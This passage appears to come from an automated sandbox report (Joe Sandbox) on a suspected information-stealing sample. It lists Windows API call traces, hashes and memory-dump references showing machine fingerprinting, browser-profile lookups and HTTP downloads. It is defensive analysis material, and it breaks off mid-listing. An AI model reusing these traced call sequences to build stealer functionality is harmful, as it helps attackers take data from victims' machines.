                                                • Part of subcall function 0041128A: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B
                                              • lstrlenA.KERNEL32(00000000), ref: 004113C3
                                                • Part of subcall function 00411F3C: malloc.MSVCRT ref: 00411F4A
                                                • Part of subcall function 00411F3C: strncpy.MSVCRT ref: 00411F5A
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 004113F0
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                              • String ID: :\$C
                                              • API String ID: 688099012-3309953409
                                              • Opcode ID: 8b389af257ad2d7fc35aa98ad9877c37e6ff06556f6bc13ac2ef4079480c52c3
                                              • Instruction ID: b01806ac1240bb61ec39001f631bf746401bef9c976af08fb877b9c07554aa4e
                                              • Opcode Fuzzy Hash: 8b389af257ad2d7fc35aa98ad9877c37e6ff06556f6bc13ac2ef4079480c52c3
                                              • Instruction Fuzzy Hash: 7C41CF71801158AACB11EFE5DD89DEFBBBDEF4A304F10005EF615A3161EA384B84CBA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00413E8D
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                              • lstrlenA.KERNEL32(00000000), ref: 00413F26
                                                • Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00413F4D
                                              • lstrlenA.KERNEL32(00000000), ref: 00413F62
                                              • lstrlenA.KERNEL32(00000000), ref: 00413F7D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HttpInternetlstrcpylstrlen$H_prologOpenRequest$AllocConnectInfoLocalOptionQuerySend
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                              • API String ID: 3807055897-1526165396
                                              • Opcode ID: a866affe16ca8e922a6408cb586b1a7b70dcbf5fd6ac28e6a64d0ab723cbef12
                                              • Instruction ID: b57b41276dec6ca26a492a55ca436f5119a4da988d603043a531c09c6e19b168
                                              • Opcode Fuzzy Hash: a866affe16ca8e922a6408cb586b1a7b70dcbf5fd6ac28e6a64d0ab723cbef12
                                              • Instruction Fuzzy Hash: 3F41B571904245AACB10EFB5C95ABED77B8AF15308F10415FF80663282DF7C5BC9CA69
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040F98F
                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040F9D3
                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FA47
                                              • StrCmpCA.SHLWAPI(00000000,?,?,00000000), ref: 0040FB63
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 0040E080: _EH_prolog.MSVCRT ref: 0040E085
                                                • Part of subcall function 0040C544: _EH_prolog.MSVCRT ref: 0040C549
                                              • StrCmpCA.SHLWAPI(00000000), ref: 0040FC32
                                              • StrCmpCA.SHLWAPI(00000000), ref: 0040FCA7
                                              • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040FDC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy
                                              • String ID: Stable\$ Stable\$firefox
                                              • API String ID: 2120869262-2697854757
                                              • Opcode ID: dbf7b908a87ac3e2687f47c1c06b3d77baf1e4153857911e011d968a29ae6439
                                              • Instruction ID: 2d686f351f12e73225fc6c8ac9022cb08154d13c496b9ff0c214c421e4a13293
                                              • Opcode Fuzzy Hash: dbf7b908a87ac3e2687f47c1c06b3d77baf1e4153857911e011d968a29ae6439
                                              • Instruction Fuzzy Hash: 9EE1A471D00248AADF10EBB9D946BDD7FB4AF15304F50805EE854A72C2DBB85788CBA6
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00404DCF
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                              • StrCmpCA.SHLWAPI(?), ref: 00404E38
                                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                              • CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                              • InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                              • InternetCloseHandle.WININET(?), ref: 00404EF2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$H_prologOpen$CrackCreateReadWritelstrcpylstrlen
                                              • String ID:
                                              • API String ID: 2737972104-0
                                              • Opcode ID: 58fd7c8425cd75db9ef55b366ba41277c8add291d519841efbba3146873fab0c
                                              • Instruction ID: 40f2a40c1b145a76db93a13b23b7e4ef2072ce215efde77c980a902296a0f081
                                              • Opcode Fuzzy Hash: 58fd7c8425cd75db9ef55b366ba41277c8add291d519841efbba3146873fab0c
                                              • Instruction Fuzzy Hash: D3417CB1900109AFDB10EFA0DD85EEF7B7DFB06344F10402AF611E61A1DB385A85CBA4
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00406CCD
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D53
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Local$AllocCloseCreateFreeH_prologHandleReadSize
                                              • String ID:
                                              • API String ID: 3869837436-0
                                              • Opcode ID: 174411ba258b1a29d43bc86467ee122807ef5a1b6d4641874f2b7c6b02b5fb05
                                              • Instruction ID: b9358723902a14ac63eee70e7098df6ba5ec4b78117a06a8e82214e953c2bb32
                                              • Opcode Fuzzy Hash: 174411ba258b1a29d43bc86467ee122807ef5a1b6d4641874f2b7c6b02b5fb05
                                              • Instruction Fuzzy Hash: 57216274A00105EBDB21AF64DC49AAFBB7AEF46750F10052AF512E62A0D7349D91CB54
                                              APIs
                                              • memset.MSVCRT ref: 00411223
                                              • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004275CB,?,?,00000000), ref: 0041123F
                                              • RegQueryValueExA.KERNEL32(004275CB,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 0041125E
                                              • CharToOemA.USER32(?,?), ref: 0041127B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CharOpenQueryValuememset
                                              • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                              • API String ID: 1728412123-1211650757
                                              • Opcode ID: 1aad6db4980826362cbf698b7aaf78977adb6fc9db8169ce01a2533db0b13e86
                                              • Instruction ID: ae0fef36a3430a2a3548cf371294cce895aeefb830ee84e82f567c5d5b1294d0
                                              • Opcode Fuzzy Hash: 1aad6db4980826362cbf698b7aaf78977adb6fc9db8169ce01a2533db0b13e86
                                              • Instruction Fuzzy Hash: 2A01447590421DFFDB10DBA0DC85EEAB77DDB14704F1000A2B654E1051EB745FC89B60
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 00410D77
                                              • HeapAlloc.KERNEL32(00000000), ref: 00410D7E
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00410D9E
                                              • wsprintfA.USER32 ref: 00410DC4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                              • String ID: %d MB$@
                                              • API String ID: 3644086013-3474575989
                                              • Opcode ID: e74134ef69fcbf62df99f2c8c471d1dcb5f42ba18690647747baa5289bd01d98
                                              • Instruction ID: 29db27eb239e43eec5d646d2985c61976423ee968cafef2e50cc3a271c3c9b51
                                              • Opcode Fuzzy Hash: e74134ef69fcbf62df99f2c8c471d1dcb5f42ba18690647747baa5289bd01d98
                                              • Instruction Fuzzy Hash: 6AF036B5640208ABEB549BA4DD4AFFE76BDE746705F400119F702E6280D6B4D8818765
                                              APIs
                                                • Part of subcall function 004187E7: LoadLibraryA.KERNEL32(kernel32.dll,00418719), ref: 004187EC
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418831
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418848
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041885F
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418876
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041888D
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188A4
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188BB
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188D2
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004188E9
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418900
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418917
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041892E
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418945
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041895C
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 00418973
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 0041898A
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189A1
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189B8
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189CF
                                                • Part of subcall function 004187E7: GetProcAddress.KERNEL32 ref: 004189E6
                                                • Part of subcall function 004187E7: LoadLibraryA.KERNEL32 ref: 004189F7
                                                • Part of subcall function 004187E7: LoadLibraryA.KERNEL32 ref: 00418A08
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 004109B3: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
                                                • Part of subcall function 004109B3: HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
                                                • Part of subcall function 004109B3: GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • CloseHandle.KERNEL32(00000000), ref: 0041878C
                                              • Sleep.KERNEL32(00001B58), ref: 00418797
                                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00427BD8,?,00000000,00427716), ref: 004187A8
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004187BE
                                              • CloseHandle.KERNEL32(00000000), ref: 004187CC
                                              • ExitProcess.KERNEL32 ref: 004187D3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                              • String ID:
                                              • API String ID: 1043047581-0
                                              • Opcode ID: 862fcf18d219fb9448034a3d665a21da5d7b2c91ea51c00c9a53b4828f39b91b
                                              • Instruction ID: 48c5ba8a0da5fd7325b375cbeb95d780a710e0db7ac07b6a2c168a973bc42153
                                              • Opcode Fuzzy Hash: 862fcf18d219fb9448034a3d665a21da5d7b2c91ea51c00c9a53b4828f39b91b
                                              • Instruction Fuzzy Hash: A11187318000097BDB04FBB2DD5ACFF773D9E56704710412EF512A2092EF781AC4CA99
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00403A59
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                              • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                              • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CrackH_prologInternetlstrlen
                                              • String ID:
                                              • API String ID: 503950642-0
                                              • Opcode ID: 62280c25053302a684128e35aba3da1053fbe98ea1aabcc8c3b698535d3cb86e
                                              • Instruction ID: 3ef59998d37e527097109bce99900f70a6ef1eba41ca0b8ccb836b66ad9858aa
                                              • Opcode Fuzzy Hash: 62280c25053302a684128e35aba3da1053fbe98ea1aabcc8c3b698535d3cb86e
                                              • Instruction Fuzzy Hash: D1113D72D00209ABDB14EFA4D849ADE7F78AF15324F20422BF425E72E1DB785B85CB54
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040702A
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00426BF0,?,?,?,00426BEB,?), ref: 004070E7
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                              • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00426BF4,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00426BEF), ref: 0040715F
                                              • LoadLibraryA.KERNEL32(00000000), ref: 0040717A
                                              Strings
                                              • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004070DB, 004070E0, 004070FA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
